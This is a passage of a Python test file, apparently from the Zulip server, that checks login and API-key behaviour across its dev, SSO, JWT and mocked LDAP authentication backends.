AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password="testing"))
self.assert_json_success(result)
self.mock_ldap.reset()
self.mock_initialize.stop()
def test_inactive_user(self):
# type: () -> None
do_deactivate_user(self.user_profile)
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password=initial_password(self.email)))
self.assert_json_error_contains(result, "Your account has been disabled", 403)
def test_deactivated_realm(self):
# type: () -> None
do_deactivate_realm(self.user_profile.realm)
result = self.client_post("/api/v1/fetch_api_key",
dict(username=self.email,
password=initial_password(self.email)))
self.assert_json_error_contains(result, "Your realm has been deactivated", 403)
class DevFetchAPIKeyTest(ZulipTestCase):
def setUp(self):
# type: () -> None
self.user_profile = self.example_user('hamlet')
self.email = self.user_profile.email
def test_success(self):
# type: () -> None
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=self.email))
self.assert_json_success(result)
data = result.json()
self.assertEqual(data["email"], self.email)
self.assertEqual(data['api_key'], self.user_profile.api_key)
def test_invalid_email(self):
# type: () -> None
email = 'hamlet'
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=email))
self.assert_json_error_contains(result, "Enter a valid email address.", 400)
def test_unregistered_user(self):
# type: () -> None
email = '[email protected]'
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=email))
self.assert_json_error_contains(result, "This user is not registered.", 403)
def test_inactive_user(self):
# type: () -> None
do_deactivate_user(self.user_profile)
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=self.email))
self.assert_json_error_contains(result, "Your account has been disabled", 403)
def test_deactivated_realm(self):
# type: () -> None
do_deactivate_realm(self.user_profile.realm)
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=self.email))
self.assert_json_error_contains(result, "Your realm has been deactivated", 403)
def test_dev_auth_disabled(self):
# type: () -> None
with mock.patch('zerver.views.auth.dev_auth_enabled', return_value=False):
result = self.client_post("/api/v1/dev_fetch_api_key",
dict(username=self.email))
self.assert_json_error_contains(result, "Dev environment not enabled.", 400)
class DevGetEmailsTest(ZulipTestCase):
def test_success(self):
# type: () -> None
result = self.client_get("/api/v1/dev_get_emails")
self.assert_json_success(result)
self.assert_in_response("direct_admins", result)
self.assert_in_response("direct_users", result)
def test_dev_auth_disabled(self):
# type: () -> None
with mock.patch('zerver.views.auth.dev_auth_enabled', return_value=False):
result = self.client_get("/api/v1/dev_get_emails")
self.assert_json_error_contains(result, "Dev environment not enabled.", 400)
class FetchAuthBackends(ZulipTestCase):
def assert_on_error(self, error):
# type: (Optional[str]) -> None
if error:
raise AssertionError(error)
def test_get_server_settings(self):
# type: () -> None
result = self.client_get("/api/v1/server_settings",
subdomain="")
self.assert_json_success(result)
data = result.json()
schema_checker = check_dict_only([
('authentication_methods', check_dict_only([
('google', check_bool),
('github', check_bool),
('email', check_bool),
('ldap', check_bool),
('dev', check_bool),
('password', check_bool),
])),
('email_auth_enabled', check_bool),
('require_email_format_usernames', check_bool),
('realm_uri', check_string),
('zulip_version', check_string),
('msg', check_string),
('result', check_string),
])
self.assert_on_error(schema_checker("data", data))
with self.settings(ROOT_DOMAIN_LANDING_PAGE=False):
result = self.client_get("/api/v1/server_settings",
subdomain="")
self.assert_json_success(result)
data = result.json()
schema_checker = check_dict_only([
('authentication_methods', check_dict_only([
('google', check_bool),
('github', check_bool),
('dev', check_bool),
('email', check_bool),
('ldap', check_bool),
('password', check_bool),
])),
('email_auth_enabled', check_bool),
('require_email_format_usernames', check_bool),
('realm_uri', check_string),
('zulip_version', check_string),
('msg', check_string),
('result', check_string),
])
self.assert_on_error(schema_checker("data", data))
with self.settings(ROOT_DOMAIN_LANDING_PAGE=False):
result = self.client_get("/api/v1/server_settings",
subdomain="zulip")
self.assert_json_success(result)
data = result.json()
with_realm_schema_checker = check_dict_only([
('zulip_version', check_string),
('realm_uri', check_string),
('realm_name', check_string),
('realm_description', check_string),
('realm_icon', check_string),
('email_auth_enabled', check_bool),
('require_email_format_usernames', check_bool),
('authentication_methods', check_dict_only([
('google', check_bool),
('github', check_bool),
('dev', check_bool),
('email', check_bool),
('ldap', check_bool),
('password', check_bool),
])),
('msg', check_string),
('result', check_string),
])
self.assert_on_error(with_realm_schema_checker("data", data))
def test_fetch_auth_backend_format(self):
# type: () -> None
result = self.client_get("/api/v1/get_auth_backends")
self.assert_json_success(result)
data = result.json()
self.assertEqual(set(data.keys()),
{'msg', 'password', 'github', 'google', 'email', 'ldap',
'dev', 'result', 'zulip_version'})
for backend in set(data.keys()) - {'msg', 'result', 'zulip_version'}:
self.assertTrue(isinstance(data[backend], bool))
def test_fetch_auth_backend(self):
# type: () -> None
backends = [GoogleMobileOauth2Backend(), DevAuthBackend()]
with mock.patch('django.contrib.auth.get_backends', return_value=backends):
result = self.client_get("/api/v1/get_auth_backends")
self.assert_json_success(result)
data = result.json()
self.assertEqual(data, {
'msg': '',
'password': False,
'github': False,
'google': True,
'dev': True,
'email': False,
'ldap': False,
'result': 'success',
'zulip_version': ZULIP_VERSION,
})
# Test subdomains cases
with self.settings(ROOT_DOMAIN_LANDING_PAGE=False):
result = self.client_get("/api/v1/get_auth_backends")
self.assert_json_success(result)
data = result.json()
self.assertEqual(data, {
'msg': '',
'password': False,
'github': False,
'google': True,
'email': False,
'ldap': False,
'dev': True,
'result': 'success',
'zulip_version': ZULIP_VERSION,
})
# Verify invalid subdomain
result = self.client_get("/api/v1/get_auth_backends",
subdomain="invalid")
self.assert_json_error_contains(result, "Invalid subdomain", 400)
# Verify correct behavior with a valid subdomain with
# some backends disabled for the realm
realm = get_realm("zulip")
do_set_realm_authentication_methods(realm, dict(Google=False, Email=False, Dev=True))
result = self.client_get("/api/v1/get_auth_backends",
subdomain="zulip")
self.assert_json_success(result)
data = result.json()
self.assertEqual(data, {
'msg': '',
'password': False,
'github': False,
'google': False,
'email': False,
'ldap': False,
'dev': True,
'result': 'success',
'zulip_version': ZULIP_VERSION,
})
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
# With ROOT_DOMAIN_LANDING_PAGE, homepage fails
result = self.client_get("/api/v1/get_auth_backends",
subdomain="")
self.assert_json_error_contains(result, "Subdomain required", 400)
# With ROOT_DOMAIN_LANDING_PAGE, subdomain pages succeed
result = self.client_get("/api/v1/get_auth_backends",
subdomain="zulip")
self.assert_json_success(result)
data = result.json()
self.assertEqual(data, {
'msg': '',
'password': False,
'github': False,
'google': False,
'email': False,
'ldap': False,
'dev': True,
'result': 'success',
'zulip_version': ZULIP_VERSION,
})
class TestDevAuthBackend(ZulipTestCase):
def test_login_success(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
data = {'direct_email': email}
result = self.client_post('/accounts/login/local/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_login_with_subdomain(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
data = {'direct_email': email}
result = self.client_post('/accounts/login/local/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_choose_realm(self):
# type: () -> None
result = self.client_post('/devlogin/', subdomain="zulip")
self.assert_in_success_response(["Click on a user to log in to Zulip Dev!"], result)
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
result = self.client_post('/devlogin/', subdomain="")
self.assert_in_success_response(["Click on a user to log in!"], result)
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
data = {'new_realm': 'zephyr'}
result = self.client_post('/devlogin/', data, subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "http://zephyr.testserver")
result = self.client_get('/devlogin/', subdomain="zephyr")
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_in_success_response(["Click on a user to log in to MIT!"], result)
self.assert_not_in_success_response(["[email protected]", "[email protected]"], result)
def test_choose_realm_with_subdomains_enabled(self):
# type: () -> None
with mock.patch('zerver.views.auth.is_subdomain_root_or_alias', return_value=False):
with mock.patch('zerver.views.auth.get_realm_from_request', return_value=get_realm('zulip')):
result = self.client_get("http://zulip.testserver/devlogin/")
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_not_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_in_success_response(["Click on a user to log in to Zulip Dev!"], result)
with mock.patch('zerver.views.auth.get_realm_from_request', return_value=get_realm('zephyr')):
result = self.client_post("http://zulip.testserver/devlogin/", {'new_realm': 'zephyr'})
self.assertEqual(result["Location"], "http://zephyr.testserver")
result = self.client_get("http://zephyr.testserver/devlogin/")
self.assert_not_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_in_success_response(["[email protected]", "[email protected]"], result)
self.assert_in_success_response(["Click on a user to log in to MIT!"], result)
def test_login_failure(self):
# type: () -> None
email = self.example_email("hamlet")
data = {'direct_email': email}
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',)):
with self.assertRaisesRegex(Exception, 'Direct login not supported.'):
with mock.patch('django.core.handlers.exception.logger'):
self.client_post('/accounts/login/local/', data)
def test_login_failure_due_to_nonexistent_user(self):
# type: () -> None
email = '[email protected]'
data = {'direct_email': email}
with self.assertRaisesRegex(Exception, 'User cannot login'):
with mock.patch('django.core.handlers.exception.logger'):
self.client_post('/accounts/login/local/', data)
class TestZulipRemoteUserBackend(ZulipTestCase):
def test_login_success(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
result = self.client_post('/accounts/login/sso/', REMOTE_USER=email)
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_authenticate_with_missing_user(self):
# type: () -> None
backend = ZulipRemoteUserBackend()
self.assertIs(backend.authenticate(None), None)
def test_login_success_with_sso_append_domain(self):
# type: () -> None
username = 'hamlet'
user_profile = self.example_user('hamlet')
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',),
SSO_APPEND_DOMAIN='zulip.com'):
result = self.client_post('/accounts/login/sso/', REMOTE_USER=username)
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_login_failure(self):
# type: () -> None
email = self.example_email("hamlet")
result = self.client_post('/accounts/login/sso/', REMOTE_USER=email)
self.assertEqual(result.status_code, 200) # This should ideally be not 200.
self.assertIs(get_session_dict_user(self.client.session), None)
def test_login_failure_due_to_nonexisting_user(self):
# type: () -> None
email = '[email protected]'
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
result = self.client_post('/accounts/login/sso/', REMOTE_USER=email)
self.assertEqual(result.status_code, 200)
self.assertIs(get_session_dict_user(self.client.session), None)
self.assert_in_response("No account found for", result)
def test_login_failure_due_to_invalid_email(self):
# type: () -> None
email = 'hamlet'
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
result = self.client_post('/accounts/login/sso/', REMOTE_USER=email)
self.assert_json_error_contains(result, "Enter a valid email address.", 400)
def test_login_failure_due_to_missing_field(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
result = self.client_post('/accounts/login/sso/')
self.assert_json_error_contains(result, "No REMOTE_USER set.", 400)
def test_login_failure_due_to_wrong_subdomain(self):
# type: () -> None
email = self.example_email("hamlet")
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
with mock.patch('zerver.views.auth.get_subdomain', return_value='acme'):
result = self.client_post('http://testserver:9080/accounts/login/sso/',
REMOTE_USER=email)
self.assertEqual(result.status_code, 200)
self.assertIs(get_session_dict_user(self.client.session), None)
self.assert_in_response("No account found for", result)
def test_login_failure_due_to_empty_subdomain(self):
# type: () -> None
email = self.example_email("hamlet")
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
with mock.patch('zerver.views.auth.get_subdomain', return_value=''):
result = self.client_post('http://testserver:9080/accounts/login/sso/',
REMOTE_USER=email)
self.assertEqual(result.status_code, 200)
self.assertIs(get_session_dict_user(self.client.session), None)
self.assert_in_response("No account found for", result)
def test_login_success_under_subdomains(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
with mock.patch('zerver.views.auth.get_subdomain', return_value='zulip'):
with self.settings(
AUTHENTICATION_BACKENDS=('zproject.backends.ZulipRemoteUserBackend',)):
result = self.client_post('/accounts/login/sso/', REMOTE_USER=email)
self.assertEqual(result.status_code, 302)
self.assertIs(get_session_dict_user(self.client.session), user_profile.id)
class TestJWTLogin(ZulipTestCase):
"""
JWT uses ZulipDummyBackend.
"""
def test_login_success(self):
# type: () -> None
payload = {'user': 'hamlet', 'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
email = self.example_email("hamlet")
realm = get_realm('zulip')
auth_key = settings.JWT_AUTH_KEYS['zulip']
web_token = jwt.encode(payload, auth_key).decode('utf8')
user_profile = get_user(email, realm)
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_login_failure_when_user_is_missing(self):
# type: () -> None
payload = {'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
auth_key = settings.JWT_AUTH_KEYS['zulip']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "No user specified in JSON web token claims", 400)
def test_login_failure_when_realm_is_missing(self):
# type: () -> None
payload = {'user': 'hamlet'}
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
auth_key = settings.JWT_AUTH_KEYS['zulip']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "No realm specified in JSON web token claims", 400)
def test_login_failure_when_key_does_not_exist(self):
# type: () -> None
data = {'json_web_token': 'not relevant'}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "Auth key for this subdomain not found.", 400)
def test_login_failure_when_key_is_missing(self):
# type: () -> None
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
result = self.client_post('/accounts/login/jwt/')
self.assert_json_error_contains(result, "No JSON web token passed in request", 400)
def test_login_failure_when_bad_token_is_passed(self):
# type: () -> None
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
result = self.client_post('/accounts/login/jwt/')
self.assert_json_error_contains(result, "No JSON web token passed in request", 400)
data = {'json_web_token': 'bad token'}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "Bad JSON web token", 400)
def test_login_failure_when_user_does_not_exist(self):
# type: () -> None
payload = {'user': 'nonexisting', 'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
auth_key = settings.JWT_AUTH_KEYS['zulip']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assertEqual(result.status_code, 200) # This should ideally be not 200.
self.assertIs(get_session_dict_user(self.client.session), None)
# The /accounts/login/jwt/ endpoint should also handle the case
# where the authentication attempt throws UserProfile.DoesNotExist.
with mock.patch(
'zerver.views.auth.authenticate',
side_effect=UserProfile.DoesNotExist("Do not exist")):
result = self.client_post('/accounts/login/jwt/', data)
self.assertEqual(result.status_code, 200) # This should ideally be not 200.
self.assertIs(get_session_dict_user(self.client.session), None)
def test_login_failure_due_to_wrong_subdomain(self):
# type: () -> None
payload = {'user': 'hamlet', 'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'acme': 'key'}):
with mock.patch('zerver.views.auth.get_subdomain', return_value='acme'), \
mock.patch('logging.warning'):
auth_key = settings.JWT_AUTH_KEYS['acme']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "Wrong subdomain", 400)
self.assertEqual(get_session_dict_user(self.client.session), None)
def test_login_failure_due_to_empty_subdomain(self):
# type: () -> None
payload = {'user': 'hamlet', 'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'': 'key'}):
with mock.patch('zerver.views.auth.get_subdomain', return_value=''), \
mock.patch('logging.warning'):
auth_key = settings.JWT_AUTH_KEYS['']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assert_json_error_contains(result, "Wrong subdomain", 400)
self.assertEqual(get_session_dict_user(self.client.session), None)
def test_login_success_under_subdomains(self):
# type: () -> None
payload = {'user': 'hamlet', 'realm': 'zulip.com'}
with self.settings(JWT_AUTH_KEYS={'zulip': 'key'}):
with mock.patch('zerver.views.auth.get_subdomain', return_value='zulip'):
auth_key = settings.JWT_AUTH_KEYS['zulip']
web_token = jwt.encode(payload, auth_key).decode('utf8')
data = {'json_web_token': web_token}
result = self.client_post('/accounts/login/jwt/', data)
self.assertEqual(result.status_code, 302)
user_profile = self.example_user('hamlet')
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
class TestLDAP(ZulipTestCase):
def setUp(self):
# type: () -> None
user_profile = self.example_user('hamlet')
self.setup_subdomain(user_profile)
ldap_patcher = mock.patch('django_auth_ldap.config.ldap.initialize')
self.mock_initialize = ldap_patcher.start()
self.mock_ldap = MockLDAP()
self.mock_initialize.return_value = self.mock_ldap
self.backend = ZulipLDAPAuthBackend()
# Internally `_realm` attribute is automatically set by the
# `authenticate()` method. But for testing the `get_or_create_user()`
# method separately, we need to set it manually.
self.backend._realm = get_realm('zulip')
def tearDown(self):
# type: () -> None
self.mock_ldap.reset()
self.mock_initialize.stop()
def setup_subdomain(self, user_profile):
# type: (UserProfile) -> None
realm = user_profile.realm
realm.string_id = 'zulip'
realm.save()
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_success(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'testing')
assert(user_profile is not None)
self.assertEqual(user_profile.email, self.example_email("hamlet"))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_success_with_email_attr(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=letham,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'email': ['[email protected]'],
}
}
with self.settings(LDAP_EMAIL_ATTR='email',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate("letham", 'testing')
assert (user_profile is not None)
self.assertEqual(user_profile.email, self.example_email("hamlet"))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_failure_due_to_wrong_password(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user = self.backend.authenticate(self.example_email("hamlet"), 'wrong')
self.assertIs(user, None)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_failure_due_to_nonexistent_user(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user = self.backend.authenticate('[email protected]', 'testing')
self.assertIs(user, None)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_ldap_permissions(self):
# type: () -> None
backend = self.backend
self.assertFalse(backend.has_perm(None, None))
self.assertFalse(backend.has_module_perms(None, None))
self.assertTrue(backend.get_all_permissions(None, None) == set())
self.assertTrue(backend.get_group_permissions(None, None) == set())
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_django_to_ldap_username(self):
# type: () -> None
backend = self.backend
with self.settings(LDAP_APPEND_DOMAIN='zulip.com'):
username = backend.django_to_ldap_username('"hamlet@test"@zulip.com')
self.assertEqual(username, '"hamlet@test"')
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_ldap_to_django_username(self):
# type: () -> None
backend = self.backend
with self.settings(LDAP_APPEND_DOMAIN='zulip.com'):
username = backend.ldap_to_django_username('"hamlet@test"')
self.assertEqual(username, '"hamlet@test"@zulip.com')
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_user_exists(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['Full Name'], 'sn': ['Short Name']}
backend = self.backend
email = self.example_email("hamlet")
user_profile, created = backend.get_or_create_user(str(email), _LDAPUser())
self.assertFalse(created)
self.assertEqual(user_profile.email, email)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_user_does_not_exist(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['Full Name'], 'sn': ['Short Name']}
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
with self.settings(AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map):
backend = self.backend
email = '[email protected]'
user_profile, created = backend.get_or_create_user(email, _LDAPUser())
self.assertTrue(created)
self.assertEqual(user_profile.email, email)
self.assertEqual(user_profile.full_name, 'Full Name')
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_user_has_invalid_name(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['<invalid name>'], 'sn': ['Short Name']}
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
with self.settings(AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map):
backend = self.backend
email = '[email protected]'
with self.assertRaisesRegex(Exception, "Invalid characters in name!"):
backend.get_or_create_user(email, _LDAPUser())
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_realm_is_deactivated(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['Full Name'], 'sn': ['Short Name']}
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
with self.settings(AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map):
backend = self.backend
email = '[email protected]'
do_deactivate_realm(backend._realm)
with self.assertRaisesRegex(Exception, 'Realm has been deactivated'):
backend.get_or_create_user(email, _LDAPUser())
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_realm_is_none(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['Full Name'], 'sn': ['Short Name']}
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
with self.settings(AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map):
backend = self.backend
email = '[email protected]'
backend._realm = None
with self.assertRaisesRegex(Exception, 'Realm is None'):
backend.get_or_create_user(email, _LDAPUser())
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_get_or_create_user_when_ldap_has_no_email_attr(self):
# type: () -> None
class _LDAPUser(object):
attrs = {'fn': ['Full Name'], 'sn': ['Short Name']}
nonexisting_attr = 'email'
with self.settings(LDAP_EMAIL_ATTR=nonexisting_attr):
backend = self.backend
email = '[email protected]'
with self.assertRaisesRegex(Exception, 'LDAP user doesn\'t have the needed email attribute'):
backend.get_or_create_user(email, _LDAPUser())
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_django_to_ldap_username_when_domain_does_not_match(self):
# type: () -> None
backend = self.backend
email = self.example_email("hamlet")
with self.assertRaisesRegex(Exception, 'Username does not match LDAP domain.'):
with self.settings(LDAP_APPEND_DOMAIN='acme.com'):
backend.django_to_ldap_username(email)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_failure_when_domain_does_not_match(self):
# type: () -> None
with self.settings(LDAP_APPEND_DOMAIN='acme.com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'pass')
self.assertIs(user_profile, None)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_failure_due_to_wrong_subdomain(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'testing',
realm_subdomain='acme')
self.assertIs(user_profile, None)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_failure_due_to_empty_subdomain(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'testing',
realm_subdomain='')
self.assertIs(user_profile, None)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_success_when_subdomain_is_none(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'testing',
realm_subdomain=None)
assert(user_profile is not None)
self.assertEqual(user_profile.email, self.example_email("hamlet"))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_success_with_valid_subdomain(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=hamlet,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
user_profile = self.backend.authenticate(self.example_email("hamlet"), 'testing',
realm_subdomain='zulip')
assert(user_profile is not None)
self.assertEqual(user_profile.email, self.example_email("hamlet"))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_login_success_when_user_does_not_exist_with_valid_subdomain(self):
# type: () -> None
self.mock_ldap.directory = {
'uid=nonexisting,ou=users,dc=acme,dc=com': {
'cn': ['NonExisting', ],
'userPassword': 'testing'
}
}
with self.settings(
LDAP_APPEND_DOMAIN='acme.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=acme,dc=com'):
user_profile = self.backend.authenticate('[email protected]', 'testing',
realm_subdomain='zulip')
assert(user_profile is not None)
self.assertEqual(user_profile.email, '[email protected]')
self.assertEqual(user_profile.full_name, 'NonExisting')
self.assertEqual(user_profile.realm.string_id, 'zulip')
class TestZulipLDAPUserPopulator(ZulipTestCase):
def test_authenticate(self):
# type: () -> None
backend = ZulipLDAPUserPopulator()
result = backend.authenticate(self.example_email("hamlet"), 'testing') # type: ignore # complains that the function does not return any value!
self.assertIs(result, None)
class TestZulipAuthMixin(ZulipTestCase):
def test_get_user(self):
# type: () -> None
backend = ZulipAuthMixin()
result = backend.get_user(11111)
self.assertIs(result, None)
class TestPasswordAuthEnabled(ZulipTestCase):
def test_password_auth_enabled_for_ldap(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',)):
realm = Realm.objects.get(string_id='zulip')
self.assertTrue(password_auth_enabled(realm))
class TestRequireEmailFormatUsernames(ZulipTestCase):
def test_require_email_format_usernames_for_ldap_with_append_domain(self):
# type: () -> None
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',),
LDAP_APPEND_DOMAIN="zulip.com"):
realm = Realm.objects.get(string_id='zulip')
self.assertFalse(require_email_format_usernames(realm))
